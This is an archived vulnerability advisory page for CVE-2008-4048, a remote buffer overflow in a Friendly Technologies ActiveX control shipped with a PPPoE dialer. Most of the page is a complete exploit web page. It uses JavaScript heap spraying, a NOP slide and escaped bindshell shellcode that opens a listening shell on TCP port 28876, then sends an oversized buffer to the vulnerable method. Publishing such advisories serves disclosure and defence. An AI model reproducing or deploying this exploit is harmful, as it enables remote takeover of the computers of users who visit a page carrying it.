Register | Forget Password | Login
Search :
SecurityReason

News

Search

SecurityAlert

About SecurityAlert

ExploitAlert

SecurityReason Research
WLB

WLB Database

Send to WLB

About WLB
RSS

News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP
Corporate

Contact

About us
Services

SecurePHP
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com
Details : SecurityAlert

  Topic : Friendly Technologies (fwRemoteCfg.dll) ActiveX Remote BOF Exploit
  SecurityAlert : 4242
  CVE : CVE-2008-4048
  CWE : CWE-119
  SecurityRisk : Medium  alert  (About)
  Remote Exploit : Yes
  Local Exploit : No
  Victim interaction required : No
  Exploit Given : Yes
  Credit : spdr.
  Published : 14.09.2008

  Affected Software : friendly_technologies:friendly_pppoe_client:3.0.0.57



  Advisory Text :  

<!--
"Friendly Technologies" provide software like L2TP and PPPoE clients to
ISPs,
who give the software to their customers on CD so they have less trouble
setting up thire connections.
They also provide remote configuration solutions .. not the best idea if
you ask me.

An overflow exists in fwRemoteCfg.dll provided with the dialer,
an example of the dialer can be found here:

==========================================================
|| Greetz to the binaryvision crew ||
|| Come visit @ http://www.binaryvision.org.il ||
|| or IRC at irc.nix.co.il / #binaryvision ||
==========================================================

* Tested on WinXP SP2 using IE6.
** For Education ONLY!
*** Written by spdr. (spdr01 [at] gmail.com)
-->

<html>
<title>Friendly Technologies - wayyy too friendly...</title>

<object classid="clsid:F4A06697-C0E7-4BB6-8C3B-E01016A4408B"
id="sucker"></object>
<input type="button" value="Exploit!"

<script>
function exploit() {
var Evil = ""; // Our Evil Buffer
var DamnIE = "\x0C\x0C\x0C\x0C"; // Damn IE changes address
when not in the 0x00 - 0x7F range :(
// Need to use heap spray rather than overwrite EIP ...

// Skyland win32 bindshell (28876/tcp) shellcode
var ShellCode =
unescape("%u4343%u4343%u43eb%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u012
0%u31ea%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7%u75c0%u39f6%u
75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b%u1c5a%ueb01%u048b%u018b%u5fe8%uff5
e%ufce0%uc031%u8b64%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c%u
6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe%uff90%uffff%uef89%uc58
9%uc481%ufe70%uffff%u3154%ufec0%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u
50c0%u5050%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6%u50c0%u355
0%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650%u81bb%u2cb4%ue8be%uff42%uffff%u
c031%u5650%ud3bb%u58fa%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc65
6%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1%udb31%u5656%u5356%u
3153%ufec0%u40c4%u5350%u5353%u5353%u5353%u5353%u6a53%u8944%u53e0%u5353%u545
3%u5350%u5353%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe%u5bff%u
c031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff%uef87%u12bb%u6d6b%ue8d0%ufec
2%uffff%uc483%u615c%u89eb");

var payLoadSize = ShellCode.length * 2; // Size of the shellcode
var SprayToAddress = 0x0C0C0C0C; // Spray up to there, could make it
shorter.

var spraySlide = unescape("%u9090%u9090"); // Nop slide
var heapHdrSize = 0x38; // size of heap header blocks in MSIE,
hopefully.
var BlockSize = 0x100000; // Size of each block
var SlideSize = BlockSize - (payLoadSize + heapHdrSize); // Size of the
Nop slide
var heapBlocks = (SprayToAddress - 0x100000) / BlockSize; // Number of
blocks

spraySlide = MakeNopSlide(spraySlide, SlideSize); // Create our slide


// [heap header][nopslide][shellcode]
memory = new Array();
for (k = 0; k < heapBlocks; k++)
memory[k] = spraySlide + ShellCode;

// Create Evil Buffer
while(Evil.length < 800)
Evil += "A";
Evil += DamnIE;

// Pwn
sucker.CreateURLShortcut("con", "con", Evil, 1); // Using 'con' as
filename, we dont really want to make a file.
}

function MakeNopSlide(spraySlide, SlideSize){
while(spraySlide.length * 2 < SlideSize)
spraySlide += spraySlide;
spraySlide = spraySlide.substring(0, SlideSize / 2);
return spraySlide;
}
</script>

</html>



  References :

http://xforce.iss.net/xforce/xfdb/44755
http://www.securityfocus.com/bid/30891
http://www.milw0rm.com/exploits/6323
http://secunia.com/advisories/31644



  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

Microsoft VISTA TCP/IP stack buffer overflow

high- 2008-11-27

Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory.
Apache rss

» Apache Tomcat information
   disclosure

» Apache Tomcat <=
   6.0.18 UTF8 Directory
   Traversal Vulnerability

» Apache Tomcat information
   disclosure vulnerability

» Apache Tomcat XSS
   vulnerability
PHP rss

» PHP 5.2.6 SAPI
   php_getuid() overload

» PHP
   ZipArchive::extractTo()
   Directory Traversal
   Vulnerability

» PHP 5.2.6 dba_replace()
   destroying file

» PHP 5.2.6 (error_log)
   safe_mode bypass
Copyright © SecurityReason. All Rights Reserved.